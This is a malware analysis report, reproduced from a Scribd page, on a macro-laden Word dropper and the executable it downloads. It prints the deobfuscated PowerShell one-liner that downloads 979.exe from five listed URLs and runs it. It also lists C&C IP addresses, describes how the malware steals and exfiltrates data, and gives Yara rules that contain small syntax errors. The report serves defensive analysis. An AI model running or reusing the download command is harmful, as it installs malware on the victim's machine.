Scribd Logo
Upload

Welcome to Scribd!

  • Malware Analysis Report 2018 10 05

    Uploaded by

    tramcar.forts-01
    2 views7 pages

    Original Title

    Malware-Analysis-Report-2018-10-05

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    2 views7 pages

    Malware Analysis Report 2018 10 05

    Uploaded by

    tramcar.forts-01

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 7

    Malware Analysis Report

    1. File info
    File name: FILE-025909.doc
    MD5: 7beeda071116da212aa8d3ffc4631516
    Size: 275,584 Bytes
    2. Analysis Environments
    Operating System Windows 7- 32bit
    Analysis Tool IDA, Immunity Debugger, Olly Dbg,
    Exeinfo PE, SysTracer, ProcessExplorer,
    VBA Debbuger, OfficeMalScanner
    3. Analysis Result
    Use OfficemalScanner check specimen and find 3 VB Macro files that is into malware.
    After dumping VB Macro, notice they were obfuscate.

    Use VBA Debbuger in Office to debug malware. Throughout the process of debugging,
    we get a string that is used to run the shell as show bellow.

    1
    This shell will run a powershell script:

    powershell $Tmz=new-object
    Net.WebClient;$qYd='http://hockeystickz.com/XE6LOJ@http://jeffweeksphotography.co
    m/7mHSXX@http://hellcatshockey.org/k@http://gsverwelius.nl/7Sf68C7x@http://aile.pu
    b/KmKEymIK'.Split('@');$qtJ = '979';$ITK=$env:public+'\'+$qtJ+'.exe';foreach($Puq
    in $qYd){try{$Tmz.DownloadFile($Puq, $ITK);Invoke-Item $ITK;break;}catch{}}
    Its purpose is this malware download a excute file with name is 797.exe and run this file.
    C&C of document malware:
     http://hockeystickz.com/XE6LOJ
     http://jeffweeksphotography.com/7mHSXX
     http://hellcatshockey.org/k
     http://gsverwelius.nl/7Sf68C7x
     http://aile.pub/KmKEymIK
    Analyze Excute file “979.exe”
    File info
    MD5: 8d79ee8da119c2856f3fbaef9b8fa938
    Size: 472,064 Bytes

    Use debbuger to debug specimen, I notice it uses the self modify technique to make it
    difficult to analyze. Malware decrytp a lot of byte into its, after copy them into memory,
    decrypt and modify on memory.

    2
    And final, the result is a data segment similar a PE file.

    Malware overwrite the above data into malware loaded on memory. The main execute is
    into data that is decrypt and write over.
    The figure below shows the differences in malware after overwriting executable code in
    memory

    3
    Let’s analyze code on memory.
    Malware create a process with name “979.exe”

    The new “979.exe” process check a “bearsfail.exe” file in folder


    “C:\Users\username\AppData\Local\Microsoft\Windows”. If this file don’t exist,
    malware will create file and copy its into folder.

    After copying its, malware create process. This process will create a process with same
    name, this behavior is as same as “979.exe” file.

    Malware get Computer name, list process running and other data. Data is encode and
    encrypt by CryptEncypt API funtion

    4
    The next step, malware encode data with base64.

    Final, malware connect to C&C servers and send data to them.

    C&C servers:
     207.255.226.104:50000
     67.77.66.132:80
     24.37.133.84:80
     84.133.37.24:80
     207.134.189.64:50000
     68.42.248.45:8090
     189.225.87.179:8443
     41.33.127.215:8080
     98.127.32.145:80
     98.10.198.137:80
     81.7.10.106:7080

    5
     198.0.227.57:7080
    Auto start of malware
    Malware creat a key in registry to auto start when system of victim start or restart

    4. Yara rule
    rule malwareDropper
    {
    strings:
    $mz = "MZ" //Check MZ format
    $func_dec = {83 C4 0C BF A2 0F 41 00 8D 6B F1 66 8B 35 F8 85 44 00 83 FB
    07 73 01 4B 83 FD 10 73 01 4D 0F B7 C6 85 FF 74 63 3D 90 9B 09 00 75 0C E8 6F 96
    01 00 66 8B 35 F8 85 44 00 A1 34 91 45 00 BA 38 00 00 00 8B 08 8D 40 04 81 C1 C0
    6A 5F 01 89 48 FC 89 0D 40 91 45 00 4A 75 E9 33 C0 4F 66 85 F6 0F 94 C0 66 A3 D4
    85 44 00 8B 44 24 10 83 F8 01 73 05 48 89 44 24 10 81 FF 0C 01 00 00 77 94 6A 29}
    $data_en = {01 F3 F5 C6 2C 5E 85 70 80 32 9D CA 0D 76 CE 2E 94 AB 27 AC
    39 89 A6 6F 80 BB 97 A1 5B BC 6B 00 03 19 A1 E4 8A BB 98 D6 81 0C 5F 3A 83 BB 74
    A0 90 72 5E 3A 88 14 84 59 39 37 9D 6F 6B B9 E9 D8 30 F9 49 B5 02 FC 07 01 BC 3F
    F8 F3 CD A1 B3 50 B4 D5 DE 07 FA C3 AE 15 17 DF 9B C6 C3 74 06 FD C1 36 38 A1
    AA 7B 52 98 A5 3A C2 1E 8C B6 26 F3 A3 84 3F 72 18 25 4A F0 C0 C3 C7 6F AF 44
    A7 6F C5 B4 9F 0F 12 23 D3 77 CB D5 AB 91 FD F5 55 98}
    $gen_ip = {E8 C9 B7 FF FF 83 C4 04 85 C0 0F 84 FD 00 00 00 68 FA 8F C0 1D

    6
    BA 54 00 00 00 B9 40 05 41 00 E8 BA B0 FF FF 8B 4F 14 83 C4 04 8B F0 0F B6 01 50
    0F B6 41 01 50 0F B6 41 02 50 0F B6 41 03 50 56 8D 85 50 FF FF FF 6A 40 50 FF 15
    6C 35 41 00 83 C4 1C 8B CE E8 25 B1 FF FF 8B 4D FC B8 AB AA AA AA}
    condition:
    $mz at 0 and (f$unc_dec or $data_en or $gen_ip)
    }
    rule malwareOffice
    {
    strings:
    $header = {D0 CF 11 E0 A1 B1 1A E1} //Check header office 2003
    $shell_execute = {53 68 65 6C 6C [-]6D 73 6F 42 61 72 54 79 70 65 4E 6F 72 6D
    61 6C
    condition:
    $header at 0 and $shell_execute
    }

    5. Conclusion
    This malware is a downloader and obfuscate. Dropper malware steals information after
    infecting the victim’s computer. It self modify on memory to makes it difficult for an
    analyst. It decrypt a piece of data and then overwrite its own executable code in memory,
    after executing main code.

    You might also like